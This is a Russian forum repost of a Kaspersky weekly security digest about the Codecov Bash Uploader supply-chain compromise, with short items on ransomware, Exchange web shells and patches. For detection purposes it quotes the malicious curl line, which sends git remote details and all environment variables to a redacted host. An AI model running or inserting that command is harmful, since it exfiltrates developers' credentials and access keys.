[Информационная безопасность] Security Week 16: атака на цепочку поставок в компании Codecov
Автор
Сообщение
news_bot ®
Стаж: 6 лет 9 месяцев
Сообщений: 27286
В четверг 15 апреля компания Codecov опубликовала сообщение о взломе собственной инфраструктуры и потенциальной утечке данных у клиентов. Главный продукт Codecov предназначен для разработчиков ПО и позволяет улучшать покрытие кода тестами. Пострадала утилита Bash Uploader, предназначенная для отправки отчетов на серверы Codecov.
В сообщении компании пока нет всех технических деталей взлома, но известно, что атакующие воспользовались уязвимостью в процессе создания образов Docker и через нее смогли модифицировать скрипт Bash Uploader. В свою очередь, зараженный код был доставлен к потребителям, за исключением тех, кто использует особую версию продукта без облачных функций. Модификация кода впервые произошла еще 31 января. Как минимум 2,5 месяца с серверов Codecov распространялся, по сути, вредоносный скрипт. Ключи доступа к облачным средствам разработки пострадавших клиентов с высокой вероятностью утекли.
Клиентам Codecov рекомендовано проверить установленную версию скрипта на наличие следующей строки:
curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://REDACTED/upload/v2 || true
Последствия взлома пока трудно оценить: данный инцидент можно квалифицировать как атаку на цепочку поставок в квадрате. Взломано решение для разработчиков ПО, а значит есть шанс, что код клиентов Codecov также мог быть модифицирован. В числе потенциальных пострадавших — крупные компании, включая Atlassian, P&G и GoDaddy. Кроме того, код Bash Uploader открыт, распространяется по свободной лицензии и включен в другие проекты для разработчиков ПО.
Извините, данный ресурс не поддреживается. :(
В Codecov продолжают расследование, чтобы выяснить все детали того, как ключи доступа к исходному коду попали в руки злоумышленников. Помимо этого, компания обещает внедрить средства мониторинга, чтобы исключить неавторизованную модификацию кода в будущем. Судя по всему, клиентам компании также придется провести похожий аудит.
Что еще произошло
Команда Google Project Zero обновляет правила раскрытия информации об ошибках. Теперь при обнаружении серьезной уязвимости вендору будут давать не только 90 дней на поиск решения, но, в некоторых случаях, еще 30 суток сверху на распространение патча. Но в следующем году Project Zero планирует уменьшить 90-дневное окно для разработки патча. А еще на прошлой неделе в нарушение всех этических норм обнародовали эксплойт для непропатченной уязвимости в Google Chrome.
Извините, данный ресурс не поддреживается. :(
Нидерландская транспортная компания Bakker Logistiek стала жертвой вымогательства с шифрованием данных. IT-система компании на некоторое время вышла из строя, а побочным уроном стал дефицит сыра в местной сети супермаркетов.
Министерство юстиции США сообщило о принудительном удалении веб-шеллов с взломанных почтовых серверов Microsoft Exchange, без ведома владельцев.
Извините, данный ресурс не поддреживается. :(
Между тем в апрельском наборе патчей Microsoft закрыли еще четыре уязвимости в Exchange. Но их, по словам вендора, не эксплуатировали до выпуска заплаток. Обзор всех важных патчей есть на Bleeping Computer.
Еще один патч из набора Microsoft закрывает уязвимость нулевого дня в Desktop Window Manager, обнаруженную специалистами «Лаборатории Касперского».
Журналисты The Register пишут про исследование пиратских копий Microsoft Office и Adobe Photoshop. Никого не удивит результат: в пиратках нашли вредоносные программы, занятые в основном угоном пользовательских данных. Единственная относительно новая тема — кража криптовалюты Monero.
===========
Источник:
habr.com
===========
Похожие новости:
- [Информационная безопасность, Сетевые технологии, Терминология IT, Сетевое оборудование] Что такое VPN, Proxy, Tor? Разбор
- [Информационная безопасность] FileAuditor на СХД Huawei
- [Информационная безопасность, История IT] Подстава века или таинственная история взлома Ситибанка
- [Информационная безопасность, Законодательство в IT] Shodan: границы дозволенного или где кончается белая шляпа хакера
- [Информационная безопасность, Разработка веб-сайтов, PHP, Программирование] Слабые места PHP: думай как хакер
- [Информационная безопасность, Сетевые технологии, Законодательство в IT, IT-компании] В Сети появился якобы список сервисов туннелирования трафика, для которых разработают меры блокировки
- [Информационная безопасность, Законодательство в IT, IT-компании] «Сбер» опроверг утечку данных 500 тыс. клиентов программы «СберПремьер»
- [Firefox, Информационная безопасность, Расширения для браузеров] Встроенная поддержка FTP будет удалена в Firefox 90
- [Информационная безопасность, Разработка веб-сайтов, Google Chrome, Браузеры] Отключение Google FloC на вашем веб-сайте (перевод)
- [Высокая производительность, Информационная безопасность, Программирование, Будущее здесь] Безопасность в масштабе HighLoad — магия или realtime?
Теги для поиска: #_informatsionnaja_bezopasnost (Информационная безопасность), #_codecov, #_bash_uploader, [url=https://torrents-local.xyz/search.php?nm=%23_blog_kompanii_«laboratorija_kasperskogo»&to=0&allw=0&o=1&s=0&f%5B%5D=820&f%5B%5D=959&f%5B%5D=958&f%5B%5D=872&f%5B%5D=967&f%5B%5D=954&f%5B%5D=885&f%5B%5D=882&f%5B%5D=863&f%5B%5D=881&f%5B%5D=860&f%5B%5D=884&f%5B%5D=865&f%5B%5D=873&f%5B%5D=861&f%5B%5D=864&f%5B%5D=883&f%5B%5D=957&f%5B%5D=859&f%5B%5D=966&f%5B%5D=956&f%5B%5D=955]#_blog_kompanii_«laboratorija_kasperskogo» (
Блог компании «Лаборатория Касперского»
)[/url], #_informatsionnaja_bezopasnost (
Информационная безопасность
)
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 14:12
Часовой пояс: UTC + 5
| Автор | Сообщение |
|---|---|
|
news_bot ®
Стаж: 6 лет 9 месяцев |
|
|
В четверг 15 апреля компания Codecov опубликовала сообщение о взломе собственной инфраструктуры и потенциальной утечке данных у клиентов. Главный продукт Codecov предназначен для разработчиков ПО и позволяет улучшать покрытие кода тестами. Пострадала утилита Bash Uploader, предназначенная для отправки отчетов на серверы Codecov.  В сообщении компании пока нет всех технических деталей взлома, но известно, что атакующие воспользовались уязвимостью в процессе создания образов Docker и через нее смогли модифицировать скрипт Bash Uploader. В свою очередь, зараженный код был доставлен к потребителям, за исключением тех, кто использует особую версию продукта без облачных функций. Модификация кода впервые произошла еще 31 января. Как минимум 2,5 месяца с серверов Codecov распространялся, по сути, вредоносный скрипт. Ключи доступа к облачным средствам разработки пострадавших клиентов с высокой вероятностью утекли. Клиентам Codecov рекомендовано проверить установленную версию скрипта на наличие следующей строки: curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://REDACTED/upload/v2 || true Последствия взлома пока трудно оценить: данный инцидент можно квалифицировать как атаку на цепочку поставок в квадрате. Взломано решение для разработчиков ПО, а значит есть шанс, что код клиентов Codecov также мог быть модифицирован. В числе потенциальных пострадавших — крупные компании, включая Atlassian, P&G и GoDaddy. Кроме того, код Bash Uploader открыт, распространяется по свободной лицензии и включен в другие проекты для разработчиков ПО. Извините, данный ресурс не поддреживается. :( В Codecov продолжают расследование, чтобы выяснить все детали того, как ключи доступа к исходному коду попали в руки злоумышленников. Помимо этого, компания обещает внедрить средства мониторинга, чтобы исключить неавторизованную модификацию кода в будущем. Судя по всему, клиентам компании также придется провести похожий аудит. Что еще произошло Команда Google Project Zero обновляет правила раскрытия информации об ошибках. Теперь при обнаружении серьезной уязвимости вендору будут давать не только 90 дней на поиск решения, но, в некоторых случаях, еще 30 суток сверху на распространение патча. Но в следующем году Project Zero планирует уменьшить 90-дневное окно для разработки патча. А еще на прошлой неделе в нарушение всех этических норм обнародовали эксплойт для непропатченной уязвимости в Google Chrome. Извините, данный ресурс не поддреживается. :( Нидерландская транспортная компания Bakker Logistiek стала жертвой вымогательства с шифрованием данных. IT-система компании на некоторое время вышла из строя, а побочным уроном стал дефицит сыра в местной сети супермаркетов. Министерство юстиции США сообщило о принудительном удалении веб-шеллов с взломанных почтовых серверов Microsoft Exchange, без ведома владельцев. Извините, данный ресурс не поддреживается. :( Между тем в апрельском наборе патчей Microsoft закрыли еще четыре уязвимости в Exchange. Но их, по словам вендора, не эксплуатировали до выпуска заплаток. Обзор всех важных патчей есть на Bleeping Computer. Еще один патч из набора Microsoft закрывает уязвимость нулевого дня в Desktop Window Manager, обнаруженную специалистами «Лаборатории Касперского». Журналисты The Register пишут про исследование пиратских копий Microsoft Office и Adobe Photoshop. Никого не удивит результат: в пиратках нашли вредоносные программы, занятые в основном угоном пользовательских данных. Единственная относительно новая тема — кража криптовалюты Monero. =========== Источник: habr.com =========== Похожие новости:
Блог компании «Лаборатория Касперского» )[/url], #_informatsionnaja_bezopasnost ( Информационная безопасность ) |
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 14:12
Часовой пояс: UTC + 5